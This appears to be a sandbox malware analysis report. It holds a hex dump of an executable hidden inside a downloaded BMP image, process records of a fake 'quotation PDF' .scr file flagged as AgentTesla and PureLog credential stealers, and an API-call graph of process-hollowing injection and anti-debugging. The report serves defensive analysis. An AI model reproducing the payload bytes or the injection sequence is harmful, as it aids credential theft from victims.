                                                  2024-04-23 12:44:56 UTC311INData Raw: 42 4d 36 20 8a 00 00 00 00 00 36 00 00 00 28 00 00 00 00 88 22 00 01 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 4d 00 00 ff 5a 00 00 ff 90 00 00 ff 00 00 00 ff 03 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 04 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff ff 00 00 ff ff 00 00 ff 00 00 00 ff 00 00 00 ff b8 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 40 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00
                                                  Data Ascii: BM6 6(" MZ@
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 00 00 ff 1f 00 00 ff ba 00 00 ff 0e 00 00 ff 00 00 00 ff b4 00 00 ff 09 00 00 ff cd 00 00 ff 21 00 00 ff b8 00 00 ff 01 00 00 ff 4c 00 00 ff cd 00 00 ff 21 00 00 ff 54 00 00 ff 68 00 00 ff 69 00 00 ff 73 00 00 ff 20 00 00 ff 70 00 00 ff 72 00 00 ff 6f 00 00 ff 67 00 00 ff 72 00 00 ff 61 00 00 ff 6d 00 00 ff 20 00 00 ff 63 00 00 ff 61 00 00 ff 6e 00 00 ff 6e 00 00 ff 6f 00 00 ff 74 00 00 ff 20 00 00 ff 62 00 00 ff 65 00 00 ff 20 00 00 ff 72 00 00 ff 75 00 00 ff 6e 00 00 ff 20 00 00 ff 69 00 00 ff 6e 00 00 ff 20 00 00 ff 44 00 00 ff 4f 00 00 ff 53 00 00 ff 20 00 00 ff 6d 00 00 ff 6f 00 00 ff 64 00 00 ff 65 00 00 ff 2e 00 00 ff 0d 00 00 ff 0d 00 00 ff 0a 00 00 ff 24 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff
                                                  Data Ascii: !L!This program cannot be run in DOS mode.$
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 20 00 00 ff 00 00 00 ff 00 00 00 ff 60 00 00 ff 2e 00 00 ff 72 00 00 ff 73 00 00 ff 72 00 00 ff 63 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 2c 00 00 ff 03 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff a0 00 00 ff 22 00 00 ff 00 00 00 ff 00 00 00 ff 04 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 82 00 00 ff 22 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 40 00 00 ff 00 00 00 ff 00 00 00 ff c0 00 00 ff 2e 00 00 ff 72 00 00 ff 65 00 00 ff 6c 00 00 ff 6f 00 00 ff 63 00 00 ff 00 00 00 ff 00 00 00 ff 0c 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff c0 00 00 ff 22
                                                  Data Ascii: `.rsrc,""@.reloc"
                                                  2024-04-23 12:44:56 UTC1369INData Raw: ff 90 00 00 ff 75 00 00 ff 46 00 00 ff 2a 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 3a 00 00 ff 2b 00 00 ff 05 00 00 ff 28 00 00 ff e0 00 00 ff 02 00 00 ff 44 00 00 ff 3f 00 00 ff 00 00 00 ff 28 00 00 ff 02 00 00 ff 00 00 00 ff 00 00 00 ff 06 00 00 ff 2a 00 00 ff 00 00 00 ff 3a 00 00 ff 2b 00 00 ff 05 00 00 ff 28 00 00 ff 0d 00 00 ff 92 00 00 ff 15 00 00 ff 61 00 00 ff 00 00 00 ff 28 00 00 ff e4 00 00 ff 19 00 00 ff 00 00 00 ff 06 00 00 ff 2a 00 00 ff 00 00 00 ff 3a 00 00 ff 2b 00 00 ff 05 00 00 ff 28 00 00 ff ca 00 00 ff 5a 00 00 ff 6a 00 00 ff 4a 00 00 ff 00 00 00 ff 28 00 00 ff a5 00 00 ff 02 00 00 ff 00 00 00 ff 06 00 00 ff 2a 00 00 ff 00 00 00 ff 42 00 00 ff 2b 00 00 ff 05 00 00 ff 28 00 00 ff 11 00 00 ff 6c 00 00 ff 6a 00 00 ff 66 00 00 ff 7e 00
                                                  Data Ascii: uF*:+(D?(*:+(a(*:+(ZjJ(*B+(ljf~
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 2a 00 00 ff 13 00 00 ff 30 00 00 ff 03 00 00 ff 00 00 00 ff 04 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 2a 00 00 ff 42 00 00 ff 28 00 00 ff 0f 00 00 ff 19 00 00 ff 00 00 00 ff 06 00 00 ff 7e 00 00 ff b7 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 5b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 2a 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 12 00 00 ff 00 00 00 ff 00 00 00 ff 14 00 00 ff 2a 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 12 00 00 ff 00 00 00 ff 00 00 00 ff 14 00 00 ff 2a 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 12 00 00 ff 00 00 00 ff 00 00 00 ff 14 00 00 ff 2a 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 12 00 00 ff 00 00 00 ff 00 00 00
                                                  Data Ascii: *0*B(~([****
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 00 00 ff 00 00 00 ff 00 00 00 ff 3b 00 00 ff 02 00 00 ff 00 00 00 ff 00 00 00 ff 2e 00 00 ff 03 00 00 ff 00 00 00 ff 00 00 00 ff 0b 00 00 ff 09 00 00 ff 00 00 00 ff 00 00 00 ff f8 00 00 ff 09 00 00 ff 00 00 00 ff 00 00 00 ff d3 00 00 ff 06 00 00 ff 00 00 00 ff 00 00 00 ff 38 00 00 ff e2 00 00 ff 07 00 00 ff 00 00 00 ff 00 00 00 ff 20 00 00 ff 51 00 00 ff 2c 00 00 ff a1 00 00 ff 85 00 00 ff 65 00 00 ff 20 00 00 ff 6f 00 00 ff ac 00 00 ff 73 00 00 ff 47 00 00 ff 61 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 69 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 61 00 00 ff 7e 00 00 ff c3 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 8b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 20 00 00 ff 76 00 00 ff 40 00 00 ff
                                                  Data Ascii: ;.8 Q,e osGa~{ia~( v@
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 20 00 00 ff 6d 00 00 ff 67 00 00 ff a3 00 00 ff 87 00 00 ff 20 00 00 ff ae 00 00 ff 2f 00 00 ff 25 00 00 ff bd 00 00 ff 61 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 4e 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 61 00 00 ff 7e 00 00 ff c3 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 8b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 28 00 00 ff 05 00 00 ff 00 00 00 ff 00 00 00 ff 2b 00 00 ff 80 00 00 ff 3b 00 00 ff 00 00 00 ff 00 00 00 ff 04 00 00 ff 20 00 00 ff 01 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 27 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 3a 00 00 ff f2 00 00 ff fd 00 00 ff ff
                                                  Data Ascii: mg /%a~{Na~((+; ~{':
                                                  2024-04-23 12:44:56 UTC1369INData Raw: ff 7b 00 00 ff 20 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 39 00 00 ff d3 00 00 ff fc 00 00 ff ff 00 00 ff ff 00 00 ff 26 00 00 ff 20 00 00 ff 04 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 38 00 00 ff c8 00 00 ff fc 00 00 ff ff 00 00 ff ff 00 00 ff 7e 00 00 ff b7 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 5b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 20 00 00 ff 02 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 37 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 3a 00 00 ff aa 00 00 ff fc 00 00 ff ff 00 00 ff ff 00 00 ff 26 00 00 ff 20 00 00 ff 02 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 38 00 00 ff 9f 00 00 ff fc 00 00 ff ff 00 00 ff ff 00 00 ff 20 00 00 ff 9d 00
                                                  Data Ascii: { 9& 8~([ ~{7:& 8
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 20 00 00 ff d3 00 00 ff 20 00 00 ff 81 00 00 ff 7b 00 00 ff 20 00 00 ff 01 00 00 ff d8 00 00 ff 5c 00 00 ff 21 00 00 ff 61 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 36 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 61 00 00 ff 7e 00 00 ff c3 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 8b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 20 00 00 ff 66 00 00 ff 6c 00 00 ff 12 00 00 ff dc 00 00 ff 20 00 00 ff 03 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 63 00 00 ff 20 00 00 ff 0a 00 00 ff 33 00 00 ff af 00 00 ff c6 00 00 ff 61 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 69 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 61 00 00 ff 7e 00 00 ff c3 00 00 ff 0b 00 00 ff 00 00 00
                                                  Data Ascii: { \!a~{6a~( fl c 3a~{ia~
                                                  2024-04-23 12:44:56 UTC1369INData Raw: 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 28 00 00 ff 0f 00 00 ff 00 00 00 ff 00 00 00 ff 2b 00 00 ff 80 00 00 ff 30 00 00 ff 00 00 00 ff 00 00 00 ff 04 00 00 ff 20 00 00 ff 13 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 38 00 00 ff 19 00 00 ff fa 00 00 ff ff 00 00 ff ff 00 00 ff 20 00 00 ff e3 00 00 ff 04 00 00 ff a6 00 00 ff c2 00 00 ff 65 00 00 ff 20 00 00 ff 43 00 00 ff 86 00 00 ff 65 00 00 ff 78 00 00 ff 61 00 00 ff 7e 00 00 ff 88 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 7b 00 00 ff 20 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 61 00 00 ff 7e 00 00 ff c3 00 00 ff 0b 00 00 ff 00 00 00 ff 04 00 00 ff 28 00 00 ff 8b 00 00 ff 1e 00 00 ff 00 00 00 ff 06 00 00 ff 20 00 00 ff 6f 00 00 ff 83 00 00 ff cc 00 00 ff 74 00 00 ff 20 00 00 ff fb 00 00 ff
                                                  Data Ascii: (+0 8 e Cexa~{ a~( ot


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:14:44:52
                                                  Start date:23/04/2024
                                                  Path:C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe"
                                                  Imagebase:0x820000
                                                  File size:249'072 bytes
                                                  MD5 hash:715A6E943FBAF2E9205A70E391D0FD1C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2242734994.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2226154366.00000000044F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2222485023.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2246378336.0000000009090000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2226154366.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:14:45:51
                                                  Start date:23/04/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xc80000
                                                  File size:56'368 bytes
                                                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2896066000.0000000003075000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:3.8%
                                                    Total number of Nodes:213
                                                    Total number of Limit Nodes:7
                                                    execution_graph 44325 7480b4f 44326 74800c5 44325->44326 44327 74812ff 44326->44327 44330 7485468 44326->44330 44334 7485470 44326->44334 44331 74854b0 CheckRemoteDebuggerPresent 44330->44331 44333 74854f6 44331->44333 44333->44326 44335 74854b0 CheckRemoteDebuggerPresent 44334->44335 44337 74854f6 44335->44337 44337->44326 44338 5c00198 44340 5c001a7 44338->44340 44339 5c0009d 44340->44339 44343 5c01a58 44340->44343 44347 5c01a68 44340->44347 44344 5c01a7d 44343->44344 44351 5c01c1a 44344->44351 44348 5c01a7d 44347->44348 44350 5c01c1a 15 API calls 44348->44350 44349 5c01a9f 44349->44339 44350->44349 44352 5c01c35 44351->44352 44356 5c027f0 44352->44356 44371 5c027e2 44352->44371 44353 5c01b13 44357 5c02805 44356->44357 44386 5c0345c 44357->44386 44392 5c030fb 44357->44392 44397 5c02a28 44357->44397 44403 5c038e4 44357->44403 44408 5c02a63 44357->44408 44413 5c034a2 44357->44413 44417 5c02f82 44357->44417 44422 5c02b21 44357->44422 44426 5c02e51 44357->44426 44431 5c02ea0 44357->44431 44436 5c02b7c 44357->44436 44442 5c033dc 44357->44442 44358 5c02827 44358->44353 44372 5c02805 44371->44372 44374 5c02ea0 3 API calls 44372->44374 44375 5c02e51 3 API calls 44372->44375 44376 5c02b21 7 API calls 44372->44376 44377 5c02f82 3 API calls 44372->44377 44378 5c034a2 3 API calls 44372->44378 44379 5c02a63 3 API calls 44372->44379 44380 5c038e4 3 API calls 44372->44380 44381 5c02a28 3 API calls 44372->44381 44382 5c030fb 2 API calls 44372->44382 44383 5c0345c 2 API calls 44372->44383 44384 5c033dc 4 API calls 44372->44384 44385 5c02b7c 7 API calls 44372->44385 44373 5c02827 44373->44353 44374->44373 44375->44373 44376->44373 44377->44373 44378->44373 44379->44373 44380->44373 44381->44373 44382->44373 44383->44373 44384->44373 44385->44373 44387 5c028bd 44386->44387 44388 5c0364c 44386->44388 44387->44358 44447 5c05158 44388->44447 44452 5c05168 44388->44452 44389 5c03688 44393 5c03673 44392->44393 44395 5c05158 2 API calls 44393->44395 44396 5c05168 2 API calls 44393->44396 44394 5c03688 44395->44394 44396->44394 44398 5c028bd 44397->44398 44399 5c03207 44397->44399 44398->44358 44465 5c04fc8 44399->44465 44471 5c04fd8 44399->44471 44400 5c0324c 44400->44358 44404 5c028bd 44403->44404 44405 5c02a63 44403->44405 44404->44358 44490 5c05030 44405->44490 44496 5c05021 44405->44496 44409 5c02a6d 44408->44409 44411 5c05030 3 API calls 44409->44411 44412 5c05021 3 API calls 44409->44412 44410 5c028bd 44410->44358 44411->44410 44412->44410 44415 5c05030 3 API calls 44413->44415 44416 5c05021 3 API calls 44413->44416 44414 5c034cf 44415->44414 44416->44414 44418 5c02a8a 44417->44418 44419 5c028bd 44417->44419 44420 5c05030 3 API calls 44418->44420 44421 5c05021 3 API calls 44418->44421 44419->44358 44420->44419 44421->44419 44514 5c04f77 44422->44514 44522 5c04f88 44422->44522 44423 5c02b3c 44428 74842f9 WriteProcessMemory 44426->44428 44429 7484300 WriteProcessMemory 44426->44429 44430 74843d1 WriteProcessMemory 44426->44430 44427 5c02e77 44428->44427 44429->44427 44430->44427 44432 5c02eaa 44431->44432 44434 5c04fc8 3 API calls 44432->44434 44435 5c04fd8 3 API calls 44432->44435 44433 5c0324c 44433->44358 44434->44433 44435->44433 44437 5c03592 44436->44437 44438 5c02b89 44436->44438 44554 5c05108 44437->44554 44562 5c05118 44437->44562 44438->44358 44439 5c035ae 44443 5c033f4 44442->44443 44570 5c03ce8 44443->44570 44575 5c03cda 44443->44575 44444 5c0340c 44448 5c0517d 44447->44448 44457 74845a8 44448->44457 44461 7484560 44448->44461 44449 5c05193 44449->44389 44453 5c0517d 44452->44453 44455 74845a8 ResumeThread 44453->44455 44456 7484560 ResumeThread 44453->44456 44454 5c05193 44454->44389 44455->44454 44456->44454 44458 74845e8 ResumeThread 44457->44458 44460 7484619 44458->44460 44460->44449 44462 74845a8 ResumeThread 44461->44462 44464 7484619 44462->44464 44464->44449 44466 5c04fed 44465->44466 44477 7484108 44466->44477 44481 7484110 44466->44481 44485 74840c8 44466->44485 44467 5c0500f 44467->44400 44472 5c04fed 44471->44472 44474 7484108 VirtualAllocEx 44472->44474 44475 74840c8 VirtualAllocEx 44472->44475 44476 7484110 VirtualAllocEx 44472->44476 44473 5c0500f 44473->44400 44474->44473 44475->44473 44476->44473 44478 7484150 VirtualAllocEx 44477->44478 44480 748418d 44478->44480 44480->44467 44482 7484150 VirtualAllocEx 44481->44482 44484 748418d 44482->44484 44484->44467 44487 7484160 VirtualAllocEx 44485->44487 44488 74840f2 44485->44488 44489 748418d 44487->44489 44488->44467 44489->44467 44491 5c05045 44490->44491 44502 74842f9 44491->44502 44506 74843d1 44491->44506 44510 7484300 44491->44510 44492 5c05067 44492->44404 44497 5c05045 44496->44497 44499 74842f9 WriteProcessMemory 44497->44499 44500 7484300 WriteProcessMemory 44497->44500 44501 74843d1 WriteProcessMemory 44497->44501 44498 5c05067 44498->44404 44499->44498 44500->44498 44501->44498 44503 7484300 WriteProcessMemory 44502->44503 44505 7484396 44503->44505 44505->44492 44507 74843ef 44506->44507 44508 7484387 WriteProcessMemory 44506->44508 44507->44492 44509 7484396 44508->44509 44509->44492 44511 7484345 WriteProcessMemory 44510->44511 44513 7484396 44511->44513 44513->44492 44515 5c04f9d 44514->44515 44530 7483928 44515->44530 44536 7483b57 44515->44536 44540 7483c20 44515->44540 44544 748391c 44515->44544 44550 7483bd9 44515->44550 44516 5c04fb6 44516->44423 44523 5c04f9d 44522->44523 44525 7483928 2 API calls 44523->44525 44526 7483bd9 Wow64SetThreadContext 44523->44526 44527 748391c 2 API calls 44523->44527 44528 7483c20 Wow64SetThreadContext 44523->44528 44529 7483b57 Wow64SetThreadContext 44523->44529 44524 5c04fb6 44524->44423 44525->44524 44526->44524 44527->44524 44528->44524 44529->44524 44531 748398c CreateProcessA 44530->44531 44533 7483b14 Wow64SetThreadContext 44531->44533 44535 7483cad 44533->44535 44535->44516 44537 7483b65 Wow64SetThreadContext 44536->44537 44539 7483cad 44537->44539 44539->44516 44541 7483c65 Wow64SetThreadContext 44540->44541 44543 7483cad 44541->44543 44543->44516 44545 748398c CreateProcessA 44544->44545 44547 7483b14 Wow64SetThreadContext 44545->44547 44549 7483cad 44547->44549 44549->44516 44551 7483b97 44550->44551 44551->44550 44552 7483c85 Wow64SetThreadContext 44551->44552 44553 7483cad 44552->44553 44553->44516 44555 5c0512d 44554->44555 44557 7483928 2 API calls 44555->44557 44558 7483bd9 Wow64SetThreadContext 44555->44558 44559 748391c 2 API calls 44555->44559 44560 7483c20 Wow64SetThreadContext 44555->44560 44561 7483b57 Wow64SetThreadContext 44555->44561 44556 5c05146 44556->44439 44557->44556 44558->44556 44559->44556 44560->44556 44561->44556 44563 5c0512d 44562->44563 44565 7483928 2 API calls 44563->44565 44566 7483bd9 Wow64SetThreadContext 44563->44566 44567 748391c 2 API calls 44563->44567 44568 7483c20 Wow64SetThreadContext 44563->44568 44569 7483b57 Wow64SetThreadContext 44563->44569 44564 5c05146 44564->44439 44565->44564 44566->44564 44567->44564 44568->44564 44569->44564 44571 5c03cff 44570->44571 44573 5c03d21 44571->44573 44580 5c03e92 44571->44580 44585 5c03eee 44571->44585 44573->44444 44576 5c03ce8 44575->44576 44577 5c03d21 44576->44577 44578 5c03e92 4 API calls 44576->44578 44579 5c03eee 4 API calls 44576->44579 44577->44444 44578->44577 44579->44577 44581 5c03e9b 44580->44581 44582 5c03dd8 44581->44582 44583 7483928 2 API calls 44581->44583 44584 748391c 2 API calls 44581->44584 44583->44582 44584->44582 44586 5c03f16 44585->44586 44587 5c03dd8 44586->44587 44588 7483928 2 API calls 44586->44588 44589 748391c 2 API calls 44586->44589 44588->44587 44589->44587 44590 7480196 44592 74800c5 44590->44592 44591 74812ff 44592->44591 44593 7485468 CheckRemoteDebuggerPresent 44592->44593 44594 7485470 CheckRemoteDebuggerPresent 44592->44594 44593->44592 44594->44592 44600 5c004bf 44601 5c0009d 44600->44601 44602 5c001e0 44600->44602 44602->44601 44603 5c01a58 15 API calls 44602->44603 44604 5c01a68 15 API calls 44602->44604 44603->44601 44604->44601

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 413 72007b0-72007ca 414 72007d6-72007e2 413->414 415 72007cc-72007d3 413->415 417 72007e4-72007f1 414->417 418 720083e-7200841 414->418 425 72007f7-7200827 417->425 426 7200a0f-7200a47 417->426 419 7200843-7200845 418->419 420 7200854-7200857 418->420 424 720084d 419->424 422 7200859-7200877 420->422 423 720087d-7200880 420->423 422->423 432 7200a4e-7200a99 422->432 427 7200a05-7200a0c 423->427 428 7200886-720088c 423->428 424->420 454 7200834-7200837 425->454 455 7200829-7200832 425->455 426->432 428->427 430 7200892-720089b 428->430 436 72008d3-72008d9 430->436 437 720089d-72008ac 430->437 463 7200ad2-7200ad4 432->463 464 7200a9b-7200aa8 432->464 440 72009e4-72009ea 436->440 441 72008df-72008e8 436->441 437->436 447 72008ae-72008c7 437->447 440->427 444 72009ec-72009fc 440->444 441->440 453 72008ee-72008fa 441->453 444->427 457 72009fe-7200a03 444->457 447->436 459 72008c9-72008cc 447->459 461 7200900-7200928 453->461 462 7200998-72009dc 453->462 454->418 455->418 457->427 459->436 461->462 476 720092a-7200967 461->476 462->440 465 7200f1f-7200f26 463->465 464->463 469 7200aaa-7200ad0 464->469 469->463 481 7200ad9-7200b0d 469->481 476->462 488 7200969-7200996 476->488 489 7200bb0-7200bbf 481->489 490 7200b13-7200b1c 481->490 488->440 498 7200bc1-7200bd7 489->498 499 7200bfe 489->499 491 7200b22-7200b35 490->491 492 7200f27-7200f32 490->492 501 7200b37-7200b50 491->501 502 7200b9e-7200baa 491->502 508 7200bf7-7200bfc 498->508 509 7200bd9-7200bf5 498->509 500 7200c00-7200c05 499->500 503 7200c07-7200c28 500->503 504 7200c48-7200c64 500->504 501->502 521 7200b52-7200b60 501->521 502->489 502->490 503->504 525 7200c2a 503->525 513 7200c6a-7200c73 504->513 514 7200d2c-7200d35 504->514 508->500 509->500 513->492 519 7200c79-7200c96 513->519 517 7200d3b 514->517 518 7200f1d 514->518 522 7200d42-7200d44 517->522 523 7200da6-7200db4 517->523 524 7200d49-7200d57 517->524 518->465 543 7200d1a-7200d26 519->543 544 7200c9c-7200cb2 519->544 521->502 531 7200b62-7200b66 521->531 522->465 534 7200db6-7200dbc 523->534 535 7200dcc-7200dcf 523->535 532 7200d59-7200d5f 524->532 533 7200d6f-7200d72 524->533 527 7200c2d-7200c46 525->527 527->504 531->492 538 7200b6c-7200b85 531->538 539 7200d61 532->539 540 7200d63-7200d65 532->540 545 7200d74-7200d76 533->545 546 7200d7b-7200d89 533->546 541 7200dc0-7200dc2 534->541 542 7200dbe 534->542 547 7200e60-7200e71 535->547 548 7200dd5-7200de3 535->548 538->502 561 7200b87-7200b9b 538->561 539->533 540->533 541->535 542->535 543->513 543->514 544->543 571 7200cb4-7200cc2 544->571 545->465 557 7200da1 546->557 558 7200d8b-7200d91 546->558 555 7200e73-7200e79 547->555 556 7200e89-7200e8c 547->556 559 7200de5-7200deb 548->559 560 7200dfb-7200e0e 548->560 562 7200e7b 555->562 563 7200e7d-7200e7f 555->563 556->518 565 7200e92-7200ea3 556->565 557->465 566 7200d93 558->566 567 7200d95-7200d97 558->567 568 7200ded 559->568 569 7200def-7200df1 559->569 573 7200e10-7200e16 560->573 574 7200e26-7200e33 560->574 561->502 562->556 563->556 579 7200ea5-7200eab 565->579 580 7200ebb-7200ecb 565->580 566->557 567->557 568->560 569->560 571->543 585 7200cc4-7200cc8 571->585 576 7200e18 573->576 577 7200e1a-7200e1c 573->577 574->547 588 7200e35-7200e43 574->588 576->574 577->574 581 7200ead 579->581 582 7200eaf-7200eb1 579->582 589 7200ee3-7200ef0 580->589 590 7200ecd-7200ed3 580->590 581->580 582->580 585->492 586 7200cce-7200cf7 585->586 586->543 606 7200cf9-7200d17 586->606 596 